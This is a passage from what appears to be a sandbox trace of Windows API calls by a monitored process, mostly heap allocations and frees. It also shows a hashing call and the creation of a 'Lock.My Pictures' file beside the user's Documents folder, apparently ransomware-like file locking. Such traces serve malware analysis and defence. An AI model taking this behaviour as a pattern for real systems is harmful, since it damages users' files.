hHeap=0x25c0000) returned 1 [0264.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.600] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.600] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0264.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0264.600] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.601] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0264.601] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0264.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0264.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0264.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0264.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0264.601] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0264.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0264.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0264.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0264.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0264.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0264.602] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0264.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.602] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.602] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.602] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.602] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.602] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/My Pictures" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0264.603] GetLastError () returned 0x5 [0264.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0264.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0264.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0264.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0264.603] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0264.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0264.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0264.603] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.604] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0264.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0264.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0264.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0264.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0264.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.605] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0264.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0264.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0264.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3551008 [0264.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0264.605] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.My Pictures" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.my pictures"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0264.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0264.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0264.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0264.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0264.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0264.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.606] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0264.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0264.607] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.607] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0264.607] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0264.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0264.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0264.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0264.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0264.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0264.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0264.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0264.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0264.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0264.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0264.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0264.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0264.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0264.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0264.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0264.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0264.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.609] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0264.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0264.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0264.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0264.610] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0264.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0264.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0264.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0264.610] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0264.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0264.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0264.610] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0264.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0264.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0264.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0264.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0264.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0264.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0264.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1838 [0264.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1848 [0264.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0264.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0264.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0264.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0264.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0264.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0264.613] 